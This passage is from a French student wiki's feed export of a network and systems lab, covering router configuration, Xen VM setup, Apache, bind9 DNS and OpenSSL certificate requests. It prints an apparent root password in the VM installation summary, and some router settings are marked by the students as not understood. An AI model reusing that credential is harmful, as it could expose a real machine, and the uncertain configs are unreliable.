   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
Question pour Redon addresse Ip à définir &lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   int XXXX&lt;br /&gt;
   ip address 10.10.10.2 255.255.255.0&lt;br /&gt;
   vrrp 1 ip 10.10.10.3                     &lt;br /&gt;
   vrrp 1 preempt                          //Activation de la préemption, si jamais le routeur tombe en panne, l'autre prend sa place&lt;br /&gt;
   vrrp 1 priority 100                     //Dans le vvrp n°1 on définit la priorité à 100, plus la priorité est élevé plus il sera sollicité&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E306 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;/div&gt;</summary>
		<author><name>Pcoint</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51186</id>
		<title>TP sysres IMA2a5 2019/2020 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51186"/>
				<updated>2019-11-25T19:03:58Z</updated>
		
		<summary type="html">&lt;p&gt;Pcoint : /* Affectation du certificat sur Gandi.net */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Fichier:Rex4ever.PNG|500px|right|frameless|© Copyright Ginette]]&lt;br /&gt;
== Accueil/Descriptif du groupe ==&lt;br /&gt;
Bienvenue sur la page du groupe 3. Le découpage en groupe par numéro permet de se repérer plus facilement dans l'adressage des différents réseaux nécessaire.Ce groupe est constitué de :&lt;br /&gt;
&lt;br /&gt;
*Pascal Coint&lt;br /&gt;
*Quentin Weisbecker&lt;br /&gt;
&lt;br /&gt;
Ce TP consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous avons à installer une machine virtuelle Xen avec l'OS Devian ainsi qu'implanter un auto-commutateur et un point d'accès. Nous effectuerons pas la suite des tests d'intrusion sur ces points d'accès afin de voir la vulnérabilité des différents protocoles de clé. Pour notre cas, nous nous étendrons sur les protocoles [https://fr.wikipedia.org/wiki/Wired_Equivalent_Privacy WEP] et [https://fr.wikipedia.org/wiki/Wi-Fi_Protected_Access WPA]-PSK.&lt;br /&gt;
&lt;br /&gt;
== Informations importantes == &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|4&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|10.60.3.0/24 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60B3::/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de l'ordinateur portable&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Requin&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Repérage à l'étiqueteuse&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|IMA2A5 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth03&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== La machine Virtuelle sous XEN : ima2a5-rex4ever ==&lt;br /&gt;
=== Note importante ===&lt;br /&gt;
Comme indiqué dans le sujet, nous allons créer une machine virtuelle via l'utilitaire [https://wiki.xenproject.org/wiki/Xen_Project_4.11_Man_Pages Xen] Linux sur le '''dom0 cordouan.insecserv.deule.net''' via la commande '''ssh''' et le compte administrateur usuel.Sur notre machine virtuelle nous créerons par la suite un compte pifou et un compte root identique au Zabeth.&lt;br /&gt;
&lt;br /&gt;
      Installation Summary&lt;br /&gt;
      ---------------------&lt;br /&gt;
      Hostname        :  ima2a5-rex4ever&lt;br /&gt;
      Distribution    :  ascii&lt;br /&gt;
      MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
      IP Address(es)  :  dynamic&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
      Root Password   :  sZzrYYPFZEwxsfmFghddGW5&lt;br /&gt;
&lt;br /&gt;
=== Création de notre machine virtuelle XEN ===&lt;br /&gt;
Après s'être connecté, il faut maintenant creer la machine virtuelle :      &lt;br /&gt;
      xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
L'installation se lance alors :&lt;br /&gt;
&lt;br /&gt;
      root@cordouan:~# xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
      Use of uninitialized value within %DIST in pattern match (m//) at /usr/bin/xen-create-image line 1803.&lt;br /&gt;
      &lt;br /&gt;
      General Information&lt;br /&gt;
      --------------------&lt;br /&gt;
      Hostname       :  ima2a5-rex4ever&lt;br /&gt;
      Distribution   :  ascii&lt;br /&gt;
      Mirror         :  http://fr.deb.devuan.org/merged/&lt;br /&gt;
      Partitions     :  swap            512M  (swap)&lt;br /&gt;
                        /               4G    (ext4)&lt;br /&gt;
      Image type     :  sparse&lt;br /&gt;
      Memory size    :  256M&lt;br /&gt;
      Kernel path    :  /boot/vmlinuz-4.9.0-6-amd64&lt;br /&gt;
      Initrd path    :  /boot/initrd.img-4.9.0-6-amd64&lt;br /&gt;
      &lt;br /&gt;
      Networking Information&lt;br /&gt;
      ----------------------&lt;br /&gt;
      IP Address     : DHCP [MAC: xxxxxxx]&lt;br /&gt;
      &lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating swap on /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating ext4 filesystem on /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      Installation method: debootstrap&lt;br /&gt;
&lt;br /&gt;
L'installation peut sembler bloquer sur cette dernière ligne mais il est possible de voir ce qui se passe en arrière plan via un second terminal en SSH et la commande SSH&lt;br /&gt;
      tail -f /var/xen-tools/ima2a5-rex4ever.log&lt;br /&gt;
&lt;br /&gt;
=== Ajout du bridge à ima2a5-rex4ever.cfg ===&lt;br /&gt;
Dans un premier lieu, on regarde l'existence du brige sur l'hote distant via : &lt;br /&gt;
      brctl show&lt;br /&gt;
Ce qui nous retourne : &lt;br /&gt;
      bridge name	bridge id		STP enabled	interfaces&lt;br /&gt;
      IMA2a5		8000.000af75e3dc0	no		eth1&lt;br /&gt;
      eth2&lt;br /&gt;
      if3.0&lt;br /&gt;
      IMA5sc		8000.000af75e3dc2	no		eth3&lt;br /&gt;
      eth5&lt;br /&gt;
      Insecure		8000.c81f66c22b83	no		vlan6&lt;br /&gt;
      L3MRIT		8000.000af763ae2d	no		eth4&lt;br /&gt;
      StudentsInfo		8000.c81f66c22b83	no		vlan50&lt;br /&gt;
On voit bien l'existence du bridge '''IMA2a5''', il faut donc l'ajouter à notre .cfg qui est le fichier de configuration de la VM ('''/etc/xen/ima2a5-rex4ever.cfg''')&lt;br /&gt;
et on modifie la ligne commençant par '''vif =''' et on ajoute le bridge de la manière suivante : &lt;br /&gt;
      vif = ['MAC:xxxxx,bridge = IMA2a5']&lt;br /&gt;
Après avoir modifié ce fichier, il faut le parser : xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
Une erreur '''NUMA placement failed, performance might be affected''' peut apparaître mais elle indique juste que xen n'arrive pas à disposer les VM comme il veut sur les procs, mais cela n'impactera que les performances nous passons outre ce problème.&lt;br /&gt;
&lt;br /&gt;
=== Démarrer la VM et accès console ===&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl console ima2a5-rex4ever&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). Après nous être logué,on change le mot de passe qui devient le même que le mot de passe du root de '''corduan''' ou d'une zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Montage des répertoires /var et /home ===&lt;br /&gt;
==== Creation des disques logique ====&lt;br /&gt;
Il faut d'abord créer les partitions logiques sur corduan via : &lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-home virtual&lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-var virtual&lt;br /&gt;
Il est possible qu'il affiche l'avertissement suivant : '''WARNING: ext2 signature detected on /dev/virtual/ima2a5-rex4ever-home at offset 1080. Wipe it? [y/n]'''&lt;br /&gt;
repondre alors oui(y).&lt;br /&gt;
Il est possible de verifier que votre partition a bien été crée via la commande :&lt;br /&gt;
      lvdisplay&lt;br /&gt;
On obtient alors dans la liste de toutes les partitions, nous deux partitions précedemment créées&lt;br /&gt;
      --- Logical volume ---&lt;br /&gt;
      LV Path                '''/dev/virtual/ima2a5-rex4ever-home'''&lt;br /&gt;
      LV Name                ima2a5-rex4ever-home&lt;br /&gt;
      VG Name                virtual&lt;br /&gt;
      LV UUID                mhJqFx-zO1m-PlOU-Zmeu-8NGx-7UUO-c2g9dP&lt;br /&gt;
      LV Write Access        read/write&lt;br /&gt;
      LV Creation host, time cordouan, 2019-11-08 08:47:26 +0000&lt;br /&gt;
      LV Status              available&lt;br /&gt;
      # open                 0&lt;br /&gt;
      LV Size                10.00 GiB&lt;br /&gt;
      Current LE             2560&lt;br /&gt;
      Segments               1&lt;br /&gt;
      Allocation             inherit&lt;br /&gt;
      Read ahead sectors     auto&lt;br /&gt;
      - currently set to     256&lt;br /&gt;
      Block device           254:3&lt;br /&gt;
     --- Logical volume ---&lt;br /&gt;
     LV Path                '''/dev/virtual/ima2a5-rex4ever-var'''&lt;br /&gt;
     LV Name                ima2a5-rex4ever-var&lt;br /&gt;
     VG Name                virtual&lt;br /&gt;
     LV UUID                9Bnl6S-6CE5-CtO2-hD8f-RidD-sps5-b1mrWg&lt;br /&gt;
     LV Write Access        read/write&lt;br /&gt;
     LV Creation host, time cordouan, 2019-11-08 08:50:57 +0000&lt;br /&gt;
     LV Status              available&lt;br /&gt;
     # open                 0&lt;br /&gt;
     LV Size                10.00 GiB&lt;br /&gt;
     Current LE             2560&lt;br /&gt;
     Segments               1&lt;br /&gt;
     Allocation             inherit&lt;br /&gt;
     Read ahead sectors     auto&lt;br /&gt;
     - currently set to     256&lt;br /&gt;
     Block device           254:4&lt;br /&gt;
Il faut maintenant faire pointer le système de fichier sur nos deux nouveaux repertoires pour finir la création : &lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-home&lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-var&lt;br /&gt;
Nos deux disques sont maintenant prêt, il ne reste plus qu'a les connecter avec la VM. Pour cela, il faut modifier le '''.cfg''' de nouveau.&lt;br /&gt;
&lt;br /&gt;
==== Modification du fichier de configuration ====&lt;br /&gt;
Retournons donc dans le fichier '''/etc/xen/ima2a5-rex4ever.cfg''' et dans la section disk modifier tel que : &lt;br /&gt;
&lt;br /&gt;
     disk    	= [&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/disk.img,xvda2,w',&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/swap.img,xvda1,w',               &lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-home,xvdb1,w',&lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-var,xvdb2,w',&lt;br /&gt;
                  ]&lt;br /&gt;
&lt;br /&gt;
Pour prendre effet il faut redémarrer la VM à l'aide des commandes&lt;br /&gt;
    xl shutdown ima2a5-rex4ever&lt;br /&gt;
    xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
&lt;br /&gt;
==== Configuration pour forcer le montage à chaque démarrage de la VM ====&lt;br /&gt;
Il faut ensuite aller dans la VM dans '''/etc/fstab''' et ajouter &lt;br /&gt;
    /dev/xvdb1		/home		ext4		defaults				0		2&lt;br /&gt;
    #/dev/xvdb2		/var		ext4		defaults				0		2&lt;br /&gt;
&lt;br /&gt;
Ces deux lignes permettent d'assurer que les 2 disques /var et /home soient pris en compte au démarrage de la VM.('''ATTENTION POUR LE MOMENT BIEN LAISSER # DEVANT LA 2eme LIGNE''')&lt;br /&gt;
Relancer la machine comme précédemment expliqué et testé que le /home fonctionne.&lt;br /&gt;
Pour le /var c'est un peu plus compliqué comme manipulation et il faut faire EXTREMENT attention , une fausse manipulation peut tuer la machine.&lt;br /&gt;
    mount /dev/xvdb2 /mnt&lt;br /&gt;
    rm -rf /mnt/lock&lt;br /&gt;
    rm -rf /mnt/log&lt;br /&gt;
    rm -rf /mnt/run&lt;br /&gt;
    mv /var/* /mnt&lt;br /&gt;
    vi /etc/fstab&lt;br /&gt;
Maintenant decommentez la deuxième ligne que vous aviez ajouté précedemment. Puis il faut lancer la commande :&lt;br /&gt;
    umount /mnt    &lt;br /&gt;
    mount -a&lt;br /&gt;
A l'aide de la commande '''fdisk -l''' depuis la VM, on peut verifier que nos quatres disques sont bien montés.De même avec '''df''' on obtient bien dans la liste les lignes : &lt;br /&gt;
      Filesystem		1K-blocks	Used	Available	Use%	Mounted on&lt;br /&gt;
     udev		75004		0 	75004		0%	/dev&lt;br /&gt;
     tmpfs          	23824		76 	23748		1%	/run&lt;br /&gt;
     /dev/xvda2   	4062912		459920	3376896		12%	/&lt;br /&gt;
     tmpfs           	5120		0  	5120		0%	/run/lock&lt;br /&gt;
     tmpfs         	152500  	0	152500		0%	/run/shm&lt;br /&gt;
     /dev/xvdb1  	10321208	23028   9773892		1%	/home&lt;br /&gt;
     /dev/xvdb2  	10321208	71076   9725844		1%	/var&lt;br /&gt;
La machine est donc prête, on peut passer à l'installation des paquetages linux nécessaires&lt;br /&gt;
=== Mise en place de l'adresse statique ===&lt;br /&gt;
Précedemment nous avions mis l'adresse en DHCP or il est demandé d'avoir une adresse statique (pour notre groupe il s'agit de  ''' 193.48.57.163/28 ''' )&lt;br /&gt;
&lt;br /&gt;
=== Paquetage Linux ===&lt;br /&gt;
Pour commencer, on va tout d'abord mettre le système à jour via : &lt;br /&gt;
    sudo apt-get update&lt;br /&gt;
==== Paquetages nécessaires pour le SSH ====&lt;br /&gt;
'''OpenSSH''' est un ensemble d'outils libres pour établir des communications chiffrées, donc sécurisées, sur un réseau informatique grâce au protocole '''SSH''' (Secure SHell).&lt;br /&gt;
Il chiffre tout le trafic (mots de passe y compris), via une combinaison astucieuse de chiffrement symétrique et asymétrique. '''OpenSSH''' fournit également d'autres méthodes d'authentification alternatives au traditionnel mot de passe.&lt;br /&gt;
Comme son nom l'indique, OpenSSH est développé dans le cadre du projet '''OpenBSD'''.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Nom de la bibliothèque !! Descriptif !! Commande&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt-get install openssh-client&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt install openssh-server&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, SSH est déjà présent sur la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur Web Apache2 ====&lt;br /&gt;
Le logiciel libre Apache HTTP Server (Apache) est un serveur HTTP créé et maintenu au sein de la fondation Apache. C'est le serveur HTTP le plus populaire du World Wide Web. Il est distribué selon les termes de la licence Apache. &lt;br /&gt;
Pour l'installer, il faut taper la commande : &lt;br /&gt;
    apt install apache2&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur DNS bind ====&lt;br /&gt;
Le service DNS (Domain Name System) est un service TCP/IP permettant la correspondance entre un nom de domaine qualifié (FQDN : Fully Qualified Domain Name) et une adresse IP. Ainsi, grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP.Un serveur qui héberge le service DNS est appelé &amp;quot;serveur de noms&amp;quot;. Ubuntu est livré par défaut avec BIND (Berkley Internet Naming Daemon), le serveur DNS le plus utilisé sur Internet. Pour installer bind9 :&lt;br /&gt;
    apt install bind9&lt;br /&gt;
	&lt;br /&gt;
== Le Site Web : HTTP ==&lt;br /&gt;
=== Achat d'un nom de domaine ===&lt;br /&gt;
Pour la réalisation de ce TP, nous avons dû acheter un nom de domaine via le site [https://www.gandi.net/fr Gandi.net] . On retiendra que notre nom de domaine est : [https://www.ima2a5-rex4ever.site rex4ever.site].&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage apache2 ===&lt;br /&gt;
Après avoir installé Apache2 sur la machine ( [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Paquetages_n.C3.A9cessaires_pour_le_serveur_Web_Apache2 voir ici]), il faut le paramétrer correctement (je me suis servi de [https://doc.ubuntu-fr.org/apache2 ce site]).Pour cela, on commence configurer le '''.conf''' Pour cela, on le crée via la commande '''nano /etc/sites-available/ima2a5-rex4ever.site.conf''' et on renseigne alors dans le fichier les détails suivants :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
        ServerName ima2a5-rex4ever.site&lt;br /&gt;
        ServerAlias www.ima2a5-rex4ever.site&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
        &amp;lt;Directory &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&amp;gt;&lt;br /&gt;
                Options +FollowSymLinks&lt;br /&gt;
                AllowOverride all&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.ima2a5-rex4ever.site.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.ima2a5-rex4ever.site.com.log combined&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
Maintenant qu'il est configuré, on peut déployer le site via : &lt;br /&gt;
    a2ensite ima2a5-rex4ever.site&lt;br /&gt;
Puis, on recharge la configuration de l'utilitaire Apache 2 :&lt;br /&gt;
    service apache2 reload&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage du DNS ===&lt;br /&gt;
Le DNS (Domain Name Server) est un serveur qui permet de rattacher un nom à une IP et ainsi c'est lui qui permet de faire le lien entre le nom d'un site et son contenu&lt;br /&gt;
==== Glue Records sur Gandi ====&lt;br /&gt;
Le Glue Record permet de créer des alias et ainsi de lier des IP et à des noms.C'est fort pratique pour simplifier la configuration.Pour se faire il faut se rendre dans Domain , cliquer sur le nom de notre site , aller dans l'onglet Glue Records et cliquer sur ADD&lt;br /&gt;
   name : dns.ima2a5-rex4ever.site&lt;br /&gt;
   ip adresse(s) : 193.48.57.163&lt;br /&gt;
==== Affecter le DNS du coté de Gandi.net ====&lt;br /&gt;
Par défaut, les serveurs de noms (DNS) sont 3 serveurs de DNS Live Gandi, il faut ajouter les serveurs externes :&lt;br /&gt;
*ns6.gandi.net  '''217.70.177.40'''&lt;br /&gt;
*dns.ima2a5-rex4ever.site   '''193.48.57.163'''&lt;br /&gt;
'''Note:''' il faut compter 12 à 24 heures pour la propagation sur Internet.&lt;br /&gt;
==== Le paramétrage de bind9 ====&lt;br /&gt;
Le paramétrage repose sur la configuration de ses 3 fichiers :&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.options =====&lt;br /&gt;
Ce fichier permet de gérer les DNS authorisés (de manière générale) à récuperer des informations de notre site. On le modifie pour permettre au dns de gandi de récuperer les données :&lt;br /&gt;
&lt;br /&gt;
     options {&lt;br /&gt;
     &lt;br /&gt;
         // forwarders {&lt;br /&gt;
         //     0.0.0.0;&lt;br /&gt;
         // };&lt;br /&gt;
         // dnssec-validation auto;&lt;br /&gt;
         auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         '''allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };'''&lt;br /&gt;
     };&lt;br /&gt;
     &lt;br /&gt;
     '''acl &amp;quot;allowed_to_transfer&amp;quot; {'''&lt;br /&gt;
        ''' 217.70.177.40/32; // adresse IP du dns6.gandi.net'''&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.local =====&lt;br /&gt;
Il faut maintenant déclarer à Bind9 le nom de notre fichier de configuration de DNS sous forme de zone , on le fait via ce fichier. On lui renseigne la zone : &lt;br /&gt;
    &lt;br /&gt;
     zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.ima2a5-rex4ever.site&amp;quot;;&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== le fichier /etc/bind/ima2a5-rex4ever.site=====&lt;br /&gt;
Enfin, il faut créer le fichier de configuration précedemment appelé : &lt;br /&gt;
&lt;br /&gt;
    $TTL 259200&lt;br /&gt;
    @IN SOA dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (&lt;br /&gt;
         21112019      ; Version&lt;br /&gt;
         7200    ; Refresh (2h)&lt;br /&gt;
         3600    ; Retry (1h)&lt;br /&gt;
         1209600 ; Expire (14j)&lt;br /&gt;
         7200    ; Minimum TTL (2h)&lt;br /&gt;
     @    IN NS  dns.ima2a5-rex4ever.site.    &amp;lt;= nom du dns ima2a5&lt;br /&gt;
     @    IN NS  ns6.gandi.net.               &amp;lt;= nom du dns de gandi&lt;br /&gt;
     dns  IN A   193.48.57.163                &amp;lt;= ip du dns ima2a5&lt;br /&gt;
     www  IN A   193.48.57.163                &amp;lt;= ip du site web&lt;br /&gt;
&lt;br /&gt;
Après 5 minutes de cuisson et avoir relancé bind9, c'est prêt le site en http est accessible et visualisable! On peut acceder au site internet http://www.ima2a5-rex4ever.site !&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTPS ==&lt;br /&gt;
Le SSL (Secure Socket Layer) / TLS (Transport Layer Security) est le protocole de sécurité le plus répandu qui créé un canal sécurisé entre deux machines communiquant sur Internet ou un réseau interne. Dans notre société centrée sur un Internet vulnérable, le SSL est généralement utilisé lorsqu'un navigateur doit se connecter de manière sécurisée à un serveur web.&lt;br /&gt;
&lt;br /&gt;
=== Generation d'un certificat ===&lt;br /&gt;
&lt;br /&gt;
La première étape pour générer un certificat est de concevoir un jeu de 2 clefs qui sont un '''.key''' et un '''.csr''' &lt;br /&gt;
Pour obtenir ces deux fichiers, nous utilisons l'utilitaire '''OpenSSL'''.&lt;br /&gt;
      openssl req -nodes -newkey rsa:2048 -sha256 -keyout ima2a5-rex4ever.key -out ima2a5-rex4ever.csr &lt;br /&gt;
&lt;br /&gt;
'''Mais alors comment marche cette commande?'''&lt;br /&gt;
Après avoir lu le descriptif que l'on peut obtenir via [http://www.delafond.org/traducmanfr/man/man1/openssl.1.html man openssl], il en ressort que les arguments sont :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Argument !! explication&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|req&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Gestion X.509 Certificate Signing Request (CSR). &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-nodes&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Pas de chiffrage sur la clef privée (option arbitraire no des)&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-newkey rsa:2048&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|demande de Génération d'une paire de clef RSA de 2048 bits et d'une demande de certificat.&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-keyout ima2a5-rex4ever.key&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre .key&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-out ima2a5-rex4ever.csr &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre demande de certificat .csr&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
